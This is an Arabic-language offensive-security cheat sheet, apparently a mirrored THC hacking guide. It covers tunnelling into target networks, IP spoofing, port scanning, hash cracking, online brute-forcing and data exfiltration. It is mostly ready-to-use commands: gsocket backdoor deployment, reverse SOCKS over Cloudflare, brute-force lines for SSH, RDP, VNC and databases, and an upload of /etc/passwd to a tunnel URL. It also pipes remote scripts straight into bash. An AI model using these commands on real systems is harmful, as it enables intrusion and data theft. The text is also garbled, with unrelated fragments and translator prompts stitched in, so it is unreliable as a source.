المزيد: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvesec/port-forwarding) و[نفق عبر Cloudflare إلى أي خدمة TCP](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) و[Awesome Tunneling](https://github.com/anderspitman/awesome-tunneling).

---
<a id="iptables"></a>
**3.iii.c تمرير حركة المرور عبر iptables**

قم بتمريرها عبر مضيف/موجّه دون الحاجة إلى تشغيل وكيل أو معيد توجيه في وضع المستخدم:```sh
bounceinit() {
    echo 1 >/proc/sys/net/ipv4/ip_forward
    echo 1 >/proc/sys/net/ipv4/conf/all/route_localnet
    [ $# -le 0 ] && set -- "0.0.0.0/0"
    while [ $# -gt 0 ]; do
        iptables -t mangle -I PREROUTING -s "${1}" -p tcp -m addrtype --dst-type LOCAL -m conntrack ! --ctstate ESTABLISHED -j MARK --set-mark 1188 
        shift 1
    done
    iptables -t mangle -D PREROUTING -j CONNMARK --restore-mark >/dev/null 2>/dev/null
    iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark
    iptables -I FORWARD -m mark --mark 1188 -j ACCEPT
    iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE
    iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark
}
bounce() {
    iptables -t nat -A PREROUTING -p tcp --dport "${1:?}" -m mark --mark 1188 -j DNAT --to ${2:?}:${3:?}
}
bounceinit                             # Allow EVERY IP to bounce
# bounceinit "1.2.3.4/16" "6.6.0.0/16" # Only allow these SOURCE IP's to bounce

(انظر Hackshell bounce)

ثم اضبط إعادة التوجيه كما يلي:```sh bounce 31337 144.76.220.20 22 # Bounce 31337 to segfault's ssh port. bounce 31338 127.0.0.1 8080 # Bounce 31338 to the server's 8080 (localhost) bounce 53 213.171.212.212 443 # Bounce 53 to gsrn-relay on port 443

root@kitploit:~
نستخدم هذه الحيلة للوصول إلى شبكة gsocket-relay-network (أو TOR) من عمق الشبكات المحمية بجدران الحماية.```sh
# Deploy on a target that can only reach 192.168.0.100  
GS_HOST=192.168.0.100 GS_PORT=53 ./deploy.sh  
root@kitploit:~
# Access the target  
GS_HOST=213.171.212.212 gs-netcat -i -s ...

3.vi.c عنوان IP الوهمي / انتحال IP

مفيد على مضيف داخل الشبكة المستهدفة. تعيد هذه الأداة تكوين (بدون أثر) للـ SHELL: أي برنامج (nmap, cme, ...) يُشغَّل من هذه الـ SHELL سيستخدم عنوان IP مزيفًا. ستنطلق جميع هجماتك من مضيف غير موجود.```sh source <(curl -fsSL https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/ghostip.sh)

root@kitploit:~
يعمل هذا أيضًا بالاشتراك مع:
 * [Segfault's ROOT Servers](https://thc.org/segfault/wireguard): سيقوم بتوصيل خادم ROOT الخاص بك بالشبكة المستهدفة واستخدام عنوان Ghost IP داخل الشبكة المستهدفة.
 * [QEMU Tunnels](https://securelist.com/network-tunneling-with-qemu/111803/): كما هو مذكور أعلاه، لكنه أقل أمانًا.

---
<a id="tunnel-more"></a>
**3.vi.d حيل نفق متنوعة**

### النفق عبر CDN
 * اقرأ [كيفية إنشاء نفق لأي خدمة TCP عبر CloudFlare](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) أو استخدم [DarkFlare](https://github.com/doxx/darkflare).

### توصيل مضيفك مباشرة بالشبكة البعيدة
 * [WireTap](https://github.com/sandialabs/wiretap) - يعمل كمستخدم أو root. يستخدم UDP كطبقة نقل. ([جرّبه](https://thc.org/segfault/wireguard) على segfault.)
 * [ligolo-ng](https://github.com/nicocha30/ligolo-ng) - يستخدم TCP كطبقة نقل. يعمل جيدًا عبر [cloudflare CDN](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) أو gs-netcat.

### استخدام SSH كوكيل عكسي رخيص عبر Cloudflare

تشبه هذه الطريقة [أنفاق HTTPS العكسية](#https) ولكنها تستخدم SSH بدلاً من Gost أو websocat.
- الميزة: يستخدم فقط *cloudflared* و*SSH* على الهدف.
- العيب: يتطلب اشتراك CF.

 1. انتقل إلى لوحة تحكم CF -> Zero Trust -> Networks -> Tunnels
 2. أنشئ نفق 'Cloudflared' جديدًا بأي اسم.
 3. اختر Debian و64-bit. لا يظهر الرمز Token بالكامل. استخرج "Token" بنسخ المنطقة الباهتة إلى مستند منفصل للكشف عن الرمز الكامل (السلاسل السداسية الطويلة بعد `sudo cloudflared service install <TunnelTokenHere>`).
 4. أضف نطاقًا فرعيًا (المثال يستخدم `ssh.team-teso.net`).
 5. اضبط Type=TCP URL=localhost:22```shell
### On YOUR workstation:
cloudflared tunnel run --token TunnelTokenHere

Please provide the Markdown content to translate.```shell

On the TARGET, create a reverse-SOCKS connection with SSH over Cloudflare:

ssh -o ProxyCommand="cloudflared access tcp --hostname ssh.team-teso.net" root@0 -R 1080

root@kitploit:~
- [update-sdp-installer](https://github.com/fe80Grau/update-sdp-installer) – التثبيت التلقائي لبرامج macOS باستخدام ملفات SDP (خطة توزيع البرامج).

- [PrivilegeHelperKit](https://github.com/fe80Grau/PrivilegeHelperKit) – إطار عمل لإنشاء مساعدين متميزين لتطبيقات macOS.

- [notarize-cli](https://github.com/fe80Grau/notarize-cli) – أداة سطر أوامر لتوثيق تطبيقات macOS.

- [git-credential-1password](https://github.com/fe80Grau/git-credential-1password) – مساعد بيانات اعتماد Git يسترجع بيانات الاعتماد من 1Password.

- [ms-teams-remover](https://github.com/fe80Grau/ms-teams-remover) – سكربت لإزالة Microsoft Teams بالكامل من macOS.

- [sandbox-testing](https://github.com/fe80Grau/sandbox-testing) – مجموعة من السكربتات والأدوات لاختبار عزل تطبيقات macOS.

- [update-name](https://github.com/fe80Grau/update-name) – يعيد تسمية جهاز كمبيوتر macOS بناءً على رقمه التسلسلي باستخدام Jamf Pro API.

- [ntlm-diff](https://github.com/fe80Grau/ntlm-diff) – أداة لمقارنة حركة مرور مصادقة NTLM واكتشاف الاختلافات.

- [vscode-profile](https://github.com/fe80Grau/vscode-profile) – ملف تعريف Visual Studio Code لمهام MacAdmin مع إدارة متكاملة للسكربتات.

- [crl-fetcher](https://github.com/fe80Grau/crl-fetcher) – ينزل قوائم إبطال الشهادات (CRLs) من عناوين URL المحددة في ملفات تعريف التكوين.

- [vnc-macos](https://github.com/fe80Grau/vnc-macos) – سكربتات وأدوات لإدارة VNC (مشاركة الشاشة) على macOS، بما في ذلك تمكين ARD.

- [eap-fast-config](https://github.com/fe80Grau/eap-fast-config) – إنشاء ملفات تعريف تكوين لشبكات لاسلكية معتمدة على EAP-FAST.```shell
### On your workstation, connect to _any_ host within the target network (example: ipinfo.io)
curl -x socks5h://0 https://ipinfo.io

استخدم ProxyChains أو GrafTCP لإنشاء نفق البروتوكولات الأخرى عبر الوكيل العكسي.


3.iv. استخدم أي أداة عبر بروكسي Socks

إنشاء نفق من الجهاز الهدف إلى محطة عملك باستخدام gsocket:

على شبكة الهدف:```sh

Create a SOCKS proxy into the target's network.

Use gs-netcat but ssh -D would work as well.

gs-netcat -l -S

root@kitploit:~
على محطة العمل الخاصة بك:```sh
## Create a gsocket tunnel into the target's network:
gs-netcat -p 1080

استخدام ProxyChain:```sh

Use ProxyChain to access any host on the target's network:

echo -e "[ProxyList]\nsocks5 127.0.0.1 1080" >pc.conf proxychains -f pc.conf -q curl ipinfo.io

Scan the router at 192.168.1.1

proxychains -f pc.conf -q nmap -n -Pn -sV -F --open 192.168.1.1

Start 10 nmaps in parallel:

seq 1 254 | xargs -P10 -I{} proxychains -f pc.conf -q nmap -n -Pn -sV -F --open 192.168.1.{}

root@kitploit:~
### استخدام GrafTCP:```sh
## Use graftcp to access any host on the target's network:
(graftcp-local -select_proxy_mode only_socks5 &)
graftcp curl ipinfo.io
graftcp ssh [email protected]
graftcp nmap -n -Pn -sV -F --open 19.168.1.1

3.v. اعثر على عنوان IP العام الخاص بك```sh curl -s wtfismyip.com/json | jq curl ifconfig.me dig +short myip.opendns.com @resolver1.opendns.com host myip.opendns.com resolver1.opendns.com

root@kitploit:~
احصل على معلومات الموقع الجغرافي لأي عنوان IP:```sh
curl https://ipinfo.io/8.8.8.8 | jq
curl http://ip-api.com/8.8.8.8
curl https://cli.fyi/8.8.8.8

احصل على معلومات ASN حسب عنوان IP:```sh asn() { [[ -n $1 ]] && { echo -e "begin\nverbose\n${1}\nend"|netcat whois.cymru.com 43| tail -n +2; return; } (echo -e 'begin\nverbose';cat -;echo end)|netcat whois.cymru.com 43|tail -n +2 } asn 1.1.1.1 # Single IP Lookup cat IPS.txt | asn # Bulk Lookup

root@kitploit:~
تحقق من أن TOR يعمل:```sh
curl -x socks5h://localhost:9050 -s https://check.torproject.org/api/ip
### Result should be {"IsTor":true...

3.vi. التحقق من قابلية الوصول من جميع أنحاء العالم

الأشخاص الرائعون في https://ping.pe/ يتيحون لك تنفيذ ping/traceroute/mtr/dig/port-check على مضيف من جميع أنحاء العالم، وفحص منافذ TCP، وحل أسماء النطاقات، ...والعديد من الأشياء الأخرى.

للتحقق من مدى جودة وصول مضيفك (الحالي) إلى الإنترنت، استخدم OONI Probe:```sh ooniprobe run im ooniprobe run websites ooniprobe list ooniprobe list 1

root@kitploit:~
---
<a id="check-open-ports"></a>
**3.vii. فحص/مسح المنافذ المفتوحة على عنوان IP**

[Censys](https://search.censys.io/) أو [Shodan](https://internetdb.shodan.io) خدمة البحث عن المنافذ:```shell
curl https://internetdb.shodan.io/1.1.1.1

فحص سريع للثغرات (-F)```shell

Version gathering

nmap nmap -n -Pn -sCV -F --open --min-rate 10000 scanme.nmap.org

Vulns

nmap -A -F -Pn --min-rate 10000 --script vulners.nse --script-timeout=5s scanme.nmap.org

root@kitploit:~
فحص المنافذ المفتوحة TCP:```sh
_scan_single() {
    local opt=("${2}")
    [ -f "$2" ] && opt=("-iL" "$2")
    nmap -Pn -p"${1}" --open -T4 -n -oG - "${opt[@]}" 2>/dev/null | grep -F Ports
}
scan() {
    local port="${1:?}"
    shift 1
    for ip in "$@"; do
        _scan_single "$port" "$ip"
    done
}
# scan <ports> <IP or file> ...
# scan 22,80,443 192.168.0.1
# scan - 192.168.0.1-254" 10.0.0.1-254

انظر Hackshell scan

ماسح منافذ بسيط بـ bash:```shell timeout 5 bash -c "</dev/tcp/1.2.3.4/31337" && echo OPEN || echo CLOSED

root@kitploit:~
---
<a id="bruteforce"></a>
**3.viii. كسر تجزئات كلمات المرور**

 1. [NTLM2password](https://ntlm.pw/) لكسر (البحث عن) كلمات مرور NTLM
 2. [wpa-sec](https://wpa-sec.stanev.org) لكسر (البحث عن) كلمات مرور WPA PSK

HashCat هو أداتنا الأساسية لكل شيء آخر:```shell
hashcat my-hash /usr/share/wordlists/rockyou.txt

باستخدام 10-days 7-16 char hashmask على GPU:```sh curl -fsSL https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask -o 10-days_7-16.hcmask

-d2 == Use GPU #2 only (device #2)

-O == Up to 50% faster but limits password length to <= 15

-w1 == workload low (-w3 == high)

nice -n 19 hashcat -o cracked.txt my-hash.txt -w1 -a3 10-days_7-16.hcmask -O -d2

root@kitploit:~
فك هاشات `known_hosts` الخاصة بـ OpenSSH لكشف عنوان IP:```shell
curl -SsfL https://github.com/chris408/known_hosts-hashcat/raw/refs/heads/master/ipv4_hcmask.txt -O
curl -SsfL https://github.com/chris408/known_hosts-hashcat/raw/refs/heads/master/kh-converter.py -O
python3 kh-converter.py ~/.ssh/known_hosts >known_hosts_hashes
hashcat -m 160 --quiet --hex-salt known_hosts_hashes -a 3 ipv4_hcmask.txt 

👉 اقرأ الأسئلة الشائعة.

انتبه إلى أن تجزئات $6$ بطيئة. حتى قناع الهاش 7-16 حرفًا لمدة دقيقة واحدة سيستغرق أيامًا عديدة على عنقود 8xRTX4090 لاكتماله.

استأجر عنقود وحدات معالجة رسومية RTX-4090 من vast.ai مقابل 0.40$/ساعة واستخدم dizcza/docker-hashcat:cuda (اقرأ المزيد).

بخلاف ذلك، استخدم Crackstation أو shuck.sh أو ColabCat/cloud/Cloudtopolis أو اكسر كلمات المرور على مثيلات AWS الخاصة بك.

3.xi. تخمين كلمات المرور / المفاتيح بالقوة الغاشمة

ما يلي مخصص لتخمين كلمات مرور الخدمات عبر الإنترنت بالقوة الغاشمة (التخمين).

أغبياء GMail - انقر هنا

لا يمكنك تخمين حسابات GMAIL بالقوة الغاشمة.
تم تعطيل مصادقة SMTP/تسجيل الدخول في GMAIL.
جميع أدوات كسر GMAIL بالقوة الغاشمة وتكسير كلمات المرور مزيفة.

جميع الأدوات مثبتة مسبقًا على segfault:```shell ssh [email protected] # password is 'segfault'

root@kitploit:~
(قد ترغب في استخدام [عقدة الخروج الخاصة بك](https://www.thc.org/segfault/wireguard))

الأدوات:
* [Ncrack](https://nmap.org/ncrack/man.html)
* [Nmap BRUTE](https://nmap.org/nsedoc/categories/brute.html)
* [THC Hydra](https://sectools.org/tool/hydra/)
* [Medusa](https://www.geeksforgeeks.org/password-cracking-with-medusa-in-linux/) / [الوثائق](http://foofus.net/goons/jmk/medusa/medusa.html)
* [Metasploit](https://docs.rapid7.com/metasploit/bruteforce-attacks/)
* [Crowbar](https://github.com/galkan/crowbar) - رائع لاختبار جميع مفاتيح ssh على نطاق IP مستهدف.

قوائم أسماء المستخدمين وكلمات المرور:
* `/usr/share/nmap/nselib/data`  
* `/usr/share/wordlists/seclists/Passwords`
* https://github.com/berzerk0/Probable-Wordlists - >المفضلة لدى THC<
* https://github.com/danielmiessler/SecLists  
* https://wordlists.assetnote.io  
* https://weakpass.com  
* https://crackstation.net/  


عيّن قائمة **اسم المستخدم**/**كلمة المرور** والمضيف **الهدف**.```shell
ULIST="/usr/share/wordlists/brutespray/mysql/user"
PLIST="/usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt"
T="192.168.0.1"

معاملات Nmap المفيدة:```shell --script-args userdb="${ULIST}",passdb="${PLIST}",brute.firstOnly

root@kitploit:~
معلمات **Ncrack** المفيدة:```shell
-U "${ULIST}"
-P "${PLIST}"

معاملات Hydra المفيدة:```shell -t4 # Limit to 4 tasks -l root # Set username -V # Show each login/password attempt -s 31337 # Set port -S # Use SSL -f # Exit after first valid login

root@kitploit:~
<!--```shell
## HTTP Login
hydra -l admin -P "${PLIST}" http-post-fomr "/admin.php:u=^USER&p-^PASS&f=login:'Enter'" -v

-->```shell

SSH

nmap -p 22 --script ssh-brute --script-args ssh-brute.timeout=4s "$T" ncrack -P "${PLIST}" --user root "ssh://${T}" hydra -P "${PLIST}" -l root "ssh://$T"

root@kitploit:~
## خطر أنظمة إدارة التكوين الضعيفة

إعدادات التكوين للأجهزة المتصلة تحتوي على معلومات أساسية، إذا تم اختراقها، يمكن أن تؤدي إلى خروقات أمنية كبيرة. باستخدام عنوان IP فقط، يمكن للمهاجم	الوصول إلى إعدادات الجهاز والتلاعب بها في عمليات النشر غير الآمنة.```shell
## Remote Desktop Protocol / RDP
ncrack -P "${PLIST}" --user root -p3389 "${T}"
hydra -P "${PLIST}" -l root "rdp://$T"

إذا كانت كلمة المرور تحتوي على أحرف صغيرة فإن وقت الاختراق الشامل يزيد بمقدار 26^(?) مرة. أضف عدد الأحرف لحساب إجمالي وقت الاختراق الشامل في أسوأ الحالات.

  • مجموعة أحرف كلمة المرور: a-z، A-Z، 0-9، أحرف خاصة
  • طول كلمة المرور: 8
  • التركيبات الممكنة = 72^(8)```shell

FTP

hydra -P "${PLIST}" -l user "ftp://$T"

root@kitploit:~
## Links

*   [تثبيت](#install)
*   [بداية سريعة](#quick-start)
*   [API](#api)
*   [الأسئلة الشائعة](#faq)
*   [الاعتمادات](#credits)```shell
## IMAP (email)
nmap -p 143,993 --script imap-brute "$T"

URLHunter

🚀 URLHunter - أداة متقدّمة لكشط الروابط مكتوبة بلغة Rust لاستخراج العناوين لمهام MalDev والهندسة الاجتماعية.

URLHunter```shell

POP3 (email)

nmap -p110,995 --script pop3-brute "$T"

root@kitploit:~
| ----------- | ------------------------------------------------------------------------------------------------------------------------------ |
| **المؤلفون** | [Mike Carifio](https://github.com/mcarifio), [Matthew Li](https://github.com/mttaggart), [Charley Celice](https://github.com/celice) |
| **الفئة**| تطبيقات, أمان السحابة, إدارة المشاريع, قوائم الكلمات, أمان تطبيقات الويب                                         |```shell
## MySQL
nmap -p3306 --script mysql-brute "$T"
  • تفاصيل موارد Azure [لوحة العرض]

    الأعمدة المراد عرضها في جدول موارد Azure.

    الخيارات: All, Basic, Custom

    الافتراضي: `All````shell

PostgreSQL

nmap -p5432 --script pgsql-brute "$T"

root@kitploit:~
الرجاء تزويدي بمحتوى الماركدون المراد ترجمته.```shell
## SMB (windows)
nmap --script smb-brute "$T"

يرجى تزويدي بالمحتوى المراد ترجمته.```shell

Telnet

nmap -p23 --script telnet-brute --script-args telnet-brute.timeout=8s "$T"

root@kitploit:~
مسح سلبي | `--passive-scan` | أدوات فحص سلبية في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`
فحص ثغرات | `--vulnerability` | أدوات فحص الثغرات في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`
تطبيقات الويب | `--webapp` | أدوات تطبيقات الويب في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`
تقييم قواعد البيانات | `--database` | أدوات تقييم قواعد البيانات في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`
هجمات كلمات المرور | `--password` | أدوات هجمات كلمات المرور في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`
الاختراق اللاسلكي | `--wireless` | أدوات الاختراق اللاسلكي في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`
الهندسة العكسية | `--reverse-engineering` | أدوات الهندسة العكسية في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`
استغلال الثغرات | `--exploitation` | أدوات استغلال الثغرات في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`
التطفل والتحليل | `--sniffing-spoofing` | أدوات التطفل والتحليل في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`
معالجة ما بعد الاستغلال | `--post-exploitation` | أدوات معالجة ما بعد الاستغلال في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`
الطب الشرعي | `--forensics` | أدوات الطب الشرعي في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`
أدوات الإبلاغ | `--reporting` | أدوات الإبلاغ في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`
أدوات الهندسة الاجتماعية | `--social-engineering` | أدوات الهندسة الاجتماعية في المواضيع 2, 19-23. | `kali-linux-headless`, `kali-linux-default`, `kali-linux-large`, `kali-linux-everything`

```console
$ kali-tweaks -h
Kali OS Tweaks
Usage: kali-tweaks [OPTIONS]

Options:
  -h, --help      Show this message and exit.

Sub-commands:
  shell           Modify /bin/sh
  network         Modify Network settings
  hardening       Modify security profiles for
                  Network, kernel, users, and packages
  virt            Modify Virtualisation environments
  metapackages    Modify Metapackages

Visit the Kali Linux blog post for more information.

This maps to the```shell

VNC

nmap -p5900 --script vnc-brute "$T" ncrack -P "${PLIST}" --user root "vnc://$T" hydra -P "${PLIST}" "vnc://$T" medusa -P "${PLIST}" –u root –M vnc -h "$T"

root@kitploit:~
is empty.```shell
## VNC (with metasploit)
msfconsole
use auxiliary/scanner/vnc/vnc_login
set rhosts 192.168.0.1
set pass_file /usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt
run

إدخال:```shell

HTML basic auth

echo admin >user.txt # Try only 1 username echo -e "blah\naaddd\nfoobar" >pass.txt # Add some passwords to try. 'aaddd' is the valid one. nmap -p80 --script http-brute --script-args
http-brute.hostname=pentesteracademylab.appspot.com,http-brute.path=/lab/webapp/basicauth,userdb=user.txt,passdb=pass.txt,http-brute.method=POST,brute.firstOnly
pentesteracademylab.appspot.com

root@kitploit:~
---
<a id="exfil"></a>
## 4. رفع/تنزيل/إخراج البيانات

الأسهل: اكتب `exfil` على [Segfault Root Server](https://thc.org/segfault)

أو استخدم curl وقم بتشغيل [خادم PHP exfil](https://github.com/Rouji/single_php_filehost) الخاص بك.

<a id="file-encoding"></a>

### 4.i ترميز الملفات

خدعة لنقل ملف إلى الهدف عندما لا يكون لدى الهدف إمكانية الوصول إلى الإنترنت: قم بتحويل الملف الثنائي إلى نص ASCII (base64) ثم استخدم القص واللصق. (بدلاً من ذلك، استخدم وحدة التحكم elite الخاصة بـ gs-netcat مع `Ctrl-e c` لنقل الملف عبر نفس اتصال TCP.)

استخدم `xclip` (على محطة العمل الخاصة بك) لتوجيه البيانات المشفّرة مباشرة إلى الحافظة الخاصة بك:```shell
base64 -w0 </etc/issue.net | xclip

>>> UU ترميز/فك ترميز```sh

uuencode

uuencode /etc/issue.net issue.net-COPY

root@kitploit:~
<details>
  <summary>الإخراج - انقر هنا</summary>

> begin 644 issue.net-COPY  
> 72V%L:2!'3E4O3&EN=7@@4F]L;&EN9PH\`  
> `  
> end
</details>```sh
## uudecode (cut & paste the 3 lines from above):
uudecode

>>> base64 encode/decode```sh

base64 -w0 </etc/issue.net

root@kitploit:~
<details>
  <summary>الإخراج - انقر هنا</summary>

> VWJ1bnR1IDE4LjA0LjIgTFRTCg==
</details>```sh
base64 -d >issue.net-COPY

>>> Openssl encode/decode```sh

openssl base64 </etc/issue.net

root@kitploit:~
<details>
  <summary>المخرجات - انقر هنا</summary>

> VWJ1bnR1IDE4LjA0LjIgTFRTCg==
</details>```sh
openssl base64 -d >issue.net-COPY

>>> xxd ترميز/فك ترميز```sh

xxd -p </etc/issue.net

root@kitploit:~
<details>
  <summary>الإخراج - اضغط هنا</summary>

> 4b616c6920474e552f4c696e757820526f6c6c696e670a
</details>```sh
xxd -p -r >issue.net-COPY

4.ii. نقل الملفات - باستخدام القص واللصق

الصق في ملف على الجهاز البعيد (لاحظ <<-'__EOF__' لتجنّب العبث بعلامات التبويب أو متغيرات $).```sh cat >output.txt <<-'EOF' [...] EOF ### Finish your cut & paste by typing EOF

root@kitploit:~
---
<a id="xfer-tmux"></a>
### 4.iii. نقل الملفات - باستخدام *tmux*

شغّل `tmux` على محطة العمل الخاصة بك. اتصل بهدفك بأي وسيلة تفضّلها (ssh, gs-netcat, ...).

#### من الجهاز البعيد إلى المحلي (تنزيل)

استخدم [Tmux-Logging](#tmux) لتنزيل الملفات الكبيرة من الهدف عبر الطرفية إلى محطة العمل الخاصة بك.

#### من المحلي إلى الجهاز البعيد (رفع)

شغّل أداة فك الترميز المفضلة لديك (base64) على الجهاز البعيد:```shell
# Use 'Ctrl-b $' to rename this tmux session to 'foo'
base64 -d >screen-xfer.txt

على محطة العمل الخاصة بك، ومن محطة طرفية مختلفة، أرسل البيانات المشفّرة بـ base64. ستصل على جهازك البعيد في screen-xfer.txt.```shell tmux send-keys -t foo "$(base64 -w64 </etc/issue.net)"$'\n'

Press 'Ctrl-d' in the receiving terminal.

Optional: Use -t foo:1.2 to send to window #1 and pane #2 instead.

Optional: Use 'Ctrl-b ,' to rename the window

root@kitploit:~
---
<a id="file-transfer-screen"></a>
### 4.vi. نقل الملفات - باستخدام *screen*

#### من البعيد إلى المحلي (تنزيل)

شغّل *screen* على جهازك المحلي وسجّل الدخول إلى النظام البعيد من داخل الصدفة (shell). وجّه شاشة *screen* المحلية لتسجيل كل المخرجات في ملف screen-xfer.txt:

> CTRL-a : logfile screen-xfer.txt

> CTRL-a H

نستخدم *openssl* لتشفير بياناتنا لكن أي طريقة من طرق التشفير المذكورة أعلاه تعمل. سيعرض هذا الأمر البيانات المشفرة بصيغة base64 في الطرفية وستكتب *screen* هذه البيانات إلى *screen-xfer.txt*:```sh
## On the remote system encode issue.net
openssl base64 </etc/issue.net

أوقف تسجيل شاشتك المحلية لأي بيانات إضافية:

CTRL-a H

على جهازك المحلي، قم بفك ترميز الملف:```sh openssl base64 -d <screen-xfer.txt rm -rf screen-xfer.txt

root@kitploit:~
#### من LOCAL إلى REMOTE (رفع)

على نظامك المحلي، قم بترميز البيانات:```sh
openssl base64 </etc/issue.net >screen-xfer.txt

على النظام البعيد (ومن داخل الشاشة الحالية):```sh openssl base64 -d

root@kitploit:~
اجعل *screen* يلتقط البيانات المُرمّزة بـ base64 إلى حافظة screen والصق البيانات من الحافظة إلى النظام البعيد:

> CTRL-a : readbuf screen-xfer.txt

> CTRL-a : paste .

> CTRL-d

> CTRL-d

ملاحظة: يلزم الضغط على CTRL-d مرتين بسبب [خلل في openssl](https://github.com/openssl/openssl/issues/9355).

---
<a id="file-transfer-gs-netcat"></a>
### 4.v. نقل الملفات - باستخدام gs-netcat و sftp

استخدم [gs-netcat](https://github.com/hackerschoice/gsocket) وقم بتغليف بروتوكول sftp داخله. يتيح الوصول إلى المضيفين خلف NAT/جدار الحماية.```sh
gs-netcat -s MySecret -l -e /usr/lib/sftp-server         # Host behind NAT/Firewall

من محطة العمل الخاصة بك، نفّذ هذا الأمر للاتصال بخادم SFTP:```sh export GSOCKET_ARGS="-s MySecret" # Workstation sftp -D gs-netcat # Workstation

root@kitploit:~
أو لتفريغ ملف واحد:```sh
# On the sender
gs-netcat -l <"FILENAME" # Will output a SECRET used by the receiver

# On the receiver
gs-netcat >"FILENAME"  # When prompted, enter the SECRET from the sender

4.vi. نقل الملفات - باستخدام HTTPS

التنزيل من الخادم إلى جهاز الاستقبال:

على المُرسِل/الخادم:```sh

Spawn a temporary HTTP server and share the current working directory.

python -m http.server 8080 --bind 127.0.0.1 &

alternative: php -S 127.0.0.1:8080

cloudflared tunnel -url localhost:8080

root@kitploit:~
المستقبِل: قم بالوصول إلى الرابط من أي متصفح لعرض/تنزيل نظام الملفات البعيد.

#### 1 - الرفع باستخدام PHP:

على المستقبِل:```posh
curl -fsSL -o upload_server.php https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/upload_server.php
mkdir upload
(cd upload; php -S 127.0.0.1:8080 ../upload_server.php &>/dev/null &)
cloudflared tunnel --url localhost:8080 --no-autoupdate

على المرسل:```posh

Set a function:

up() { curl -fsSL -F "file=@${1:?}" https://ABOVE-URL-HERE.trycloudflare.com; }

upload files like so:

up warez.tar.gz up /etc/passwd

root@kitploit:~
#### 2 - الرفع باستخدام PYTHON:

على جهاز الاستقبال:```posh
pip install uploadserver
python -m uploadserver &
cloudflared tunnel -url localhost:8000

على المُرسِل:```posh curl -X POST https://CF-URL-CHANGE-ME.trycloudflare.com/upload -F '[email protected]'

root@kitploit:~
---
<a id="download"></a>
### 4.vii. تنزيل الملفات بدون curl

باستخدام Python، قم بتنزيل فقط:```sh
# Declare a curl-alternative
purl() {
    local url="${1:?}"
    { [[ "${url:0:8}" == "https://" ]] || [[ "${url:0:7}" == "http://" ]]; } || url="https://${url}"
    "$(which python3 || which python || which python2 || which false)" -c "\
import urllib.request
import sys
import ssl
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sys.stdout.buffer.write(urllib.request.urlopen(\"$url\", timeout=10, context=ctx).read())"
}
# purl ipinfo.io

مثال: تثبيت gsocket باستخدام purl:```sh

cut & paste the above purl() function into your bash. Then cut & paste the following:

source <(purl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)
&& bin curl
&& bash -c "$(curl -fsSL https://gsocket.io/y)"
&& xdestruct

root@kitploit:~
باستخدام OpenSSL، قم بالتنزيل فقط:```sh
surl() {
    local r="${1#*://}"
    local opts=("-quiet" "-ign_eof")
    IFS=/ read -r host query <<<"${r}"
    openssl s_client --help 2>&1| grep -qFm1 -- -ignore_unexpected_eof && opts+=("-ignore_unexpected_eof")
    openssl s_client --help 2>&1| grep -qFm1 -- -verify_quiet && opts+=("-verify_quiet")
    echo -en "GET /${query} HTTP/1.0\r\nHost: ${host%%:*}\r\n\r\n" \
	| openssl s_client "${opts[@]}" -connect "${host%%:*}:443" \
	| sed '1,/^\r\{0,1\}$/d'
}
# surl ipinfo.io

باستخدام Perl، قم بالتنزيل فقط:```sh lurl() { local url="${1:?}" { [[ "${url:0:8}" == "https://" ]] || [[ "${url:0:7}" == "http://" ]]; } || url="https://${url}" perl -e 'use LWP::Simple qw(get); my $url = '"'${1:?}'"'; print(get $url);' }

lurl ipinfo.io

root@kitploit:~
باستخدام bash، قم بالتنزيل فقط:```sh
burl() {
    IFS=/ read -r proto x host query <<<"$1"
    exec 3<>"/dev/tcp/${host}/${PORT:-80}"
    echo -en "GET /${query} HTTP/1.0\r\nHost: ${host}\r\n\r\n" >&3
    (while read -r l; do echo >&2 "$l"; [[ $l == $'\r' ]] && break; done && cat ) <&3
    exec 3>&-
}
# burl http://ipinfo.io
# PORT=31337 burl http://37.120.235.188/blah.tar.gz >blah.tar.gz

4.viii. نقل الملفات باستخدام تفريغ عام

